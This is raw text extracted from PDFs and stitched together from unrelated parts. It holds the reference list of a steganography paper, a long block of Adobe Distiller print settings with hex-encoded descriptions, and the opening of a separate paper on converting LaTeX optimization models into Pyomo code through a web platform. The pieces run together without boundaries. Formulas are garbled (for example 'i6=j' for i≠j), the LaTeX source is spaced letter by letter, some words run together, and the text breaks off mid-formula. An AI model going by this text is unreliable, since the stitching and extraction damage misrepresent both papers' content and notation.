for Optics and Photonics 4675:1–13. Fridrich J, Goljan M, Du R. 2001. Detecting lsb steganography in color, and gray-scale images. IEEE Multimedia 8(4):22–28 DOI 10.1109/93.959097. Gaurav K, Ghanekar U. 2018. Image steganography based on canny edge detection, dilation operator and hybrid coding. Journal of Information Security and Applications 41:41–51 DOI 10.1016/j.jisa.2018.05.001. Hasan MM, Faruqi TM, Tazrean M, Chowdhury TH. 2017. Biometric encryption using duffing map. In: 2017 4th International Conference on Advances in Electrical Engineering (ICAEE). 737–742. Holmes PJ, Moon FC. 1983. Strange attractors and chaos in nonlinear mechanics. Journal of Applied Mechanics 50(4B):1021–1032 DOI 10.1115/1.3167185. IEEE Computer Society. 2008. IEEE standard for floating-point arithmetic. In: IEEE Std 754-2008. Piscataway: IEEE, 1–70. Johnson N, Jajodia S. 1998. Steganalysis of images created using current steganography software. In: International Workshop on Information Hiding. 273–289. Koptyra K, Ogiela MR. 2020. Distributed steganography in pdf file—secrets hidden in modified pages. Entropy 22(6):600 DOI 10.3390/e22060600. Kordov K. 2015a. Modified pseudo-random bit generation scheme based on two circle maps and xor function. Applied Mathematical Sciences 9:129–135 DOI 10.12988/ams.2015.411887. Kordov K. 2015b. Signature attractor based pseudorandom generation algorithm. Advanced Studies in Theoretical Physics 9(6):287–293 DOI 10.12988/astp.2015.517. Kordov KM. 2014. Modified chebyshev map based pseudo-random bit generator. AIP Conference Proceedings 1629:432–436. Marsaglia G. 1995. The marsaglia random number cdrom including the diehard battery of tests of randomness. Tallahassee: Florida State University. Marvel LM, Boncelet CG, Retter CT. 1999. Spread spectrum image steganography. IEEE Transactions on Image Processing 8(8):1075–1083 DOI 10.1109/83.777088. Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 20/21 http://dx.doi.org/10.1016/j.procs.2015.02.105 http://dx.doi.org/10.6028/NIST.SP.800-22r1a http://dx.doi.org/10.1007/s11042-019-08472-6 http://dx.doi.org/10.1007/BF00202613 http://dx.doi.org/10.1109/93.959097 http://dx.doi.org/10.1016/j.jisa.2018.05.001 http://dx.doi.org/10.1115/1.3167185 http://dx.doi.org/10.3390/e22060600 http://dx.doi.org/10.12988/ams.2015.411887 http://dx.doi.org/10.12988/astp.2015.517 http://dx.doi.org/10.1109/83.777088 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Nissar A, Mir AH. 2002. Classification of steganalysis techniques: a study. Mathematical and Software Engineering 20(6):1758–1770. Pak C, Kim J, An K, Kim C, Kim K, Pak C. 2020. A novel color image lsb steganography using improved 1d chaotic map. Multimedia Tools and Applications 79(1–2):1409–1425 DOI 10.1007/s11042-019-08103-0. Provos N, Honeyman P. 2001. Detecting steganographic content on the internet. Ann Arbor: Center for Information Technology Integration, 48103–44943. Riaz M, Ahmed J, Shah RA, Hussain A. 2018. Novel secure pseudorandom number generator based on duffing map. Wireless Personal Communications 99(1):85–93 DOI 10.1007/s11277-017-5039-9. Satish K, Jayakar T, Tobin C, Madhavi K, Murali K. 2004. Chaos based spread spectrum image steganography. IEEE Transactions on Consumer Electronics 50(2):587–590 DOI 10.1109/TCE.2004.1309431. Shenker SJ. 1982. Scaling behavior in a map of a circle onto itself: empirical results. Physica D: Nonlinear Phenomena 5(2–3):405–411 DOI 10.1016/0167-2789(82)90033-1. Stanev S, Szczypiorski K. 2016. Steganography training: a case study from university of shumen in bulgaria. International Journal of Electronics and Telecommunications 62(3):315–318 DOI 10.1515/eletel-2016-0043. Van Dooren R. 1988. On the transition from regular to chaotic behaviour in the duffing oscillator. Journal of Sound and Vibration 123(2):327–339 DOI 10.1016/S0022-460X(88)80115-9. Walker J. 2008. Ent: a pseudorandom number sequence test program. Available at http://www. fourmilab.ch/random/. Wang Z, Bovik AC, Sheikh HR, Simoncelli EP. 2004. Image quality assessment: from error visibility to structural similarity. IEEE Transactions on Image Processing 13(4):600–612 DOI 10.1109/TIP.2003.819861. Westfeld A, Pfitzmann A. 1999. Attacks on steganographic systems. In: International Workshop on Information Hiding. 61–76. Wu P, Chang X, Yang Y, Li X. 2020. BASN—learning steganography with a binary attention mechanism. Future Internet 12(3):43 DOI 10.3390/fi12030043. Yadav P, Dutta M. 2017. 3-level security based spread spectrum image steganography with enhanced peak signal to noise ratio. In: 2017 Fourth International Conference on Image Information Processing (ICIIP). Piscataway: IEEE, 1–5. Zhelezov S. 2016. Modified algorithm for steganalysis. Mathematical and Software Engineering 1(2):31–36. Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 21/21 http://dx.doi.org/10.1007/s11042-019-08103-0 http://dx.doi.org/10.1007/s11277-017-5039-9 http://dx.doi.org/10.1109/TCE.2004.1309431 http://dx.doi.org/10.1016/0167-2789(82)90033-1 http://dx.doi.org/10.1515/eletel-2016-0043 http://dx.doi.org/10.1016/S0022-460X(88)80115-9 http://www.fourmilab.ch/random/ http://www.fourmilab.ch/random/ http://dx.doi.org/10.1109/TIP.2003.819861 http://dx.doi.org/10.3390/fi12030043 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Steganography in color images with random order of pixel selection and encrypted text message embedding Introduction Pseudo-random generator based on duffing map and circle map Steganography in color images with random pixel selection Experimental setup Steganographic analysis Computational and complexity analysis Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_xpucujovsfdthnzk2l2u4345oa ---- Submitted 3 June 2018 Accepted 6 August 2018 Published 10 September 2018 Corresponding author Lazaros G. Papageorgiou, l.papageorgiou@ucl.ac.uk Academic editor Marian Gheorghe Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.161 Copyright 2018 Triantafyllidis and Papageorgiou Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS An integrated platform for intuitive mathematical programming modeling using LaTeX Charalampos P. Triantafyllidis1,2 and Lazaros G. Papageorgiou1 1 Centre for Process Systems Engineering, Department of Chemical Engineering, University College London, London, United Kingdom 2 Smith School of Enterprise and the Environment, University of Oxford, Oxford, United Kingdom ABSTRACT This paper presents a novel prototype platform that uses the same LaTeX mark-up language, commonly used to typeset mathematical content, as an input language for modeling optimization problems of various classes. The platform converts the LaTeX model into a formal Algebraic Modeling Language (AML) representation based on Pyomo through a parsing engine written in Python and solves by either via NEOS server or locally installed solvers, using a friendly Graphical User Interface (GUI). The distinct advantages of our approach can be summarized in (i) simplification and speed-up of the model design and development process (ii) non-commercial character (iii) cross-platform support (iv) easier typo and logic error detection in the description of the models and (v) minimization of working knowledge of programming and AMLs to perform mathematical programming modeling. Overall, this is a presentation of a complete workable scheme on using LaTeX for mathematical programming modeling which assists in furthering our ability to reproduce and replicate scientific work. Subjects Optimization Theory and Computation, Scientific Computing and Simulation, Programming Languages, Software Engineering Keywords Pyomo, Python, Algebraic Modeling Languages, Mathematical programming, Optimization, LaTeX INTRODUCTION Mathematical modeling constitutes a rigorous way of inexpensively simulating complex systems’ behavior in order to gain further understanding about the underlying mechanisms and trade-offs. By exploiting mathematical modeling techniques, one may manipulate the system under analysis so as to guarantee its optimal and robust operation. The dominant computing tool to assist in modeling is the Algebraic Modeling Languages (AMLs) (Kallrath, 2004). AMLs have been very successful in enabling a transparent development of different types of models, easily distributable among peers and described with clarity, effectiveness and precision. Software suites such as AIMMS (Bisschop & Roelofs, 2011), GAMS IDE (McCarl et al., 2013), JuMP (Dunning, Huchette & Lubin, 2017) as the modeling library in Julia (Lubin & Dunning, 2015), Pyomo (http://www.Pyomo.org/) (Hart et al., 2017; Hart, Watson & Woodruff, 2011) for modeling in Python (https://www.python.org/), (Rossum, 1995) and AMPL (Fourer, Gay How to cite this article Triantafyllidis and Papageorgiou (2018), An integrated platform for intuitive mathematical programming model- ing using LaTeX. PeerJ Comput. Sci. 4:e161; DOI 10.7717/peerj-cs.161 https://peerj.com mailto:l.papageorgiou@ucl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.161 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://www.Pyomo.org/ https://www.python.org/ http://dx.doi.org/10.7717/peerj-cs.161 Figure 1 The levels of abstraction in modeling; from natural language to extracting the optimal solu- tion via computational resources. Full-size DOI: 10.7717/peerjcs.161/fig-1 & Kernighan, 1993) are the most popular and widely used in both academia and industry. AMLs usually incorporate the following features: • a strict and specific syntax for the mathematical notation to describe the models; • solver interfaces, the bridge between mathematics and what the solver can understand in terms of structural demands; • a series of available optimization solvers for as many classes of problems as supported (LP, MILP, MINLP etc.) with the associated functional interfaces implemented; • explicit data file formats and implementation of the respective import/export mechanisms. AMLs provide a level of abstraction, which is higher than the direct approach of generating a model using a programming language. The different levels in the design process of a model are depicted in Fig. 1. Extending an AML (or even the entire modeling design process)canbe doneinthefollowing twoways: wecaneithersimplifythe presentframework (vertical abstraction) or extend the embedded functionality (horizontal abstraction) (Jackson, 2012). The layers of abstraction between the conception and the semantics of a mathematical model and its computational implementation may not necessarily be thin. This means that while eventually the aim of the presented platform has the same purpose as an AML that is to generate and solve models, simplification of the required syntax to describe the model is associated with higher complexity. Thus, in order to relax the syntactical requirements, we have to be able to process the same model with limited information (for instance, we do not declare index sets and parameters in the platform). This limited declaration of model components elevates the amount of processing that the platform has to conduct in order to provide equivalent formulations of the input. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 2/19 https://peerj.com https://doi.org/10.7717/peerjcs.161/fig-1 http://dx.doi.org/10.7717/peerj-cs.161 A systems approach, MOSAIC (Erik et al., 2017), has been developed based on a MathML representation using LaTeX extracts, which has been applied mainly to chemical engineering models. Both frameworks can be facilitated online, with the proposed framework built on Django while MOSAIC on Java. It can be noted that our platform can also be run off-line (locally). A key difference between the two is that in the proposed framework the user does not explicitly define indices, parameters and dynamic sets as those are identified automatically from the platform, by filtering them out from the variable list given at the bottom of the input .tex model. In the proposed platform the user can capture the entire optimization model in a single .tex file and use this directly as an input to the platform as opposed of using LaTeX extracts for generating equations in MOSAIC. Similarly though, both platforms are framing the use of LaTeX built-in commands for the specific environment to better capture errors and provide more consistency. Finally, the proposed platform exports the generated optimization model in Pyomo whereas the ability to export in many other formats is given in the MOSAIC environment. Our work expands upon two axes: (i) the programming paradigm introduced by Donald E. Knuth (Knuth, 1984) on Literate Programming and (ii) the notions of reproducible and replicable research, the fundamental basis of scientific analysis. Literate Programming focuses on generating programs based on logical flow and thinking rather than being limited by the imposing syntactical constraints of a programming language. In essence, we employ a simple mark-up language, LaTeX, to describe a problem (mathematical programming model) and then in turn produce compilable code (Pyomo abstract model) which can be used outside of the presented prototype platform’s framework. Reproducibility and the ability to replicate scientific analysis is crucial and challenging to achieve. As software tools become the vessel to unravel the computational complexity of decision-making, developing open-source software is not necessarily sufficient; the ability for the averagely versed developer to reproduce and replicate scientific work is very important to effectively deliver impact (Leek & Peng, 2015; Nature Methods Editorial Board, 2014). To quote the COIN-OR Foundation (https://www.coin-or.org/), Science evolves when previous results can be easily replicated. In the endeavor of simplifying the syntactical requirements imposed by AMLs we have developed a prototype platform. This new framework is materializing a level of modeling design that is higher than the AMLs in terms of vertical abstraction. It therefore strengthens the ability to reproduce and replicate optimization models across literature for further analysis by reducing the demands in working knowledge of AMLs or coding. The key capability is that it parses LaTeX formulations of mathematical programs (optimization problems) directly into Pyomo abstract models. The framework then combines the produced abstract model with data provided in the AMPL .dat format (containing parameters and sets) to produce a concrete model. This capability is provided through a graphical interface which accepts LaTeX input and AMPL data files, parses a Pyomo model, solves with a selected solver (CPLEX, GLPK, or the NEOS server), and returns the optimal solution if feasible, as the output. The aim is not to substitute but to establish a link between those using a higher level of abstraction. Therefore, the platform does not eliminate the use of an AML or the advantages emanating from it. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 3/19 https://peerj.com https://www.coin-or.org/ http://dx.doi.org/10.7717/peerj-cs.161 This is a complete prototype workable scheme to address how LaTeX could be used as an input language to perform mathematical programming modeling, and currently supports Linear Programming (LP), Mixed-Integer Linear Programming (MILP) as well as Mixed-Integer Quadratic Programming (MIQP) formulations. Linear Optimization (Bertsimas & Tsitsiklis, 1997; Williams, 1999) has proven to be an invaluable tool for decision support. The corpus of models invented for linear optimization over the past decades and for a multitude of domains has been consistently increasing. It can be easily demonstrated with examples in Machine Learning, Operations Research and Management Science, Physics, Information Security, Environmental Modeling and Systems Biology among many others (Yang et al., 2016; Tanveer, 2015; Silva et al., 2016; Sitek & Wikarek, 2015; Liu & Papageorgiou, 2018; Triantafyllidis et al., 2018; Cohen et al., 2017; Romeijn et al., 2006; Mitsos et al., 2009; Melas et al., 2013; Kratica, Dugošija & Savić, 2014; Mouha et al., 2012). This paper is organized as follows: in ‘Functionality’, we describe the current functionality supported by the platform at this prototype stage. In ‘Parser - Execution Engine’, we present the implementation details of the parser. ‘An illustrative parsing example’ provides a description of an illustrative example. A discussion follows in ‘Discussion’. Some concluding remarks are drawn in ‘Conclusion’. Examples of optimization models that were reproduced from scientific papers as well as their corresponding LaTeX formulations and Pyomo models can be found in the Supplemental Information 1. FUNCTIONALITY The set of rules that are admissible to formulate models in this platform are formal LaTeX commands and they do not represent in-house modifications. We assume that the model will be in the typical format that optimization programs commonly appear in scientific journals. Therefore, the model must contain the following three main parts and with respect to the correct order as well: 1. the objective function to be optimized (either maximized or minimized); 2. the (sets of) constraints, or else the relationships between the decision variables and coefficients, right-hand side (RHS); 3. the decision variables and their domain space. We used the programming environment of Python coupled with its modeling library, namely Pyomo. Similar approaches in terms of software selection have been presented for Differential and Algebraic Equations (DAE) modeling and optimization in (Nicholson et al., 2018; Nikolić, 2016). By combining Python and Pyomo we have the ability to transform a simplified representation of a mathematical model initially written in LaTeX into a formal AML formulation and eventually optimize it. In other words, the platform reads LaTeX code and then writes Pyomo abstract models or the code generates code. The resulting .py file is usable outside of the platform’s frame, thus not making the binding and usage of these two necessary after conversion. The main components that we employed for this purpose are the following: Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 4/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.161#supp-1 http://dx.doi.org/10.7717/peerj-cs.161 Figure 2 The simplified Graphical User Interface (GUI). The GUI contains the basic but fundamental options to use the platform, such as model input, solver selection and solution extraction. Full-size DOI: 10.7717/peerjcs.161/fig-2 • Front-end: HTML, JavaScript, MathJax (https://www.mathjax.org/) and Google Polymer (https://www.polymer-project.org/); • Back-end: Python with Django (https://www.djangoproject.com/) and Pyomo. In order to increase the effectiveness and user-friendliness of the platform, a Graphical- User Interface (GUI) based on HTML, JavaScript (front-end) and Django as the web- framework (back-end) has been implemented, as shown in Fig. 2. The user-input is facilitated mainly via Polymer objects (https://www.polymer-project.org/). As the main feature of the platform is to allow modeling in LaTeX language, we used MathJax as the rendering engine. In this way, the user can see the compiled version of the input model. All of these components form a single suite that works across different computational environments. The front-end is plain but incorporates the necessary functionality for input and output, as well as some solver options. The role of the back-end is to establish the communication between the GUI and the parser with the functions therein. In this way the inputs are being processed inside Python in the background, and the user simply witnesses a seamless working environment without having to understand the black-box parser in detail. Triantafyllidis and Papageorgiou (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.161 5/19 https://peerj.com https://doi.org/10.7717/peerjcs.161/fig-2 https://www.mathjax.org/ https://www.polymer-project.org/ https://www.djangoproject.com/ https://www.polymer-project.org/ http://dx.doi.org/10.7717/peerj-cs.161 The main components of the GUI are: • Abstract model input: The input of the LaTeX model, either directly inside the Polymer input text-box or via file upload (a .tex containing the required source LaTeX code) • Data files: The input of the data set which follows the abstract definition of the model via uploading the AMPL-format (.dat) data file • Solver options: An array of solver - related options such as: 1. NEOS server job using CPLEX 2. Solve the relaxed LP (if MILP) 3. Select GPLK (built-in) as the optimization solver 4. Select CPLEX (if available) as the optimization solver (currently set to default) The following is an example of a LaTeX formulated optimization problem which is ready to use with the platform; the well-known Traveling Salesman Problem (TSP) (Applegate et al., 2007): minimize ∑ i,j:i6=j (di,jxi,j) subject to : ∑ j:i6=j (xi,j)=1 ∀i ∑ i:i6=j (xi,j)=1 ∀j ui−uj+nxi,j ≤n−1 ∀i≥2,j≤|j|−1,i 6= j u∈Z,x ∈{0,1} and the raw LaTeX code used to generate this was: \ t e x t { minimize } \ sum \ l i m i t s _ { i , j : i \ neq j }^{} ( 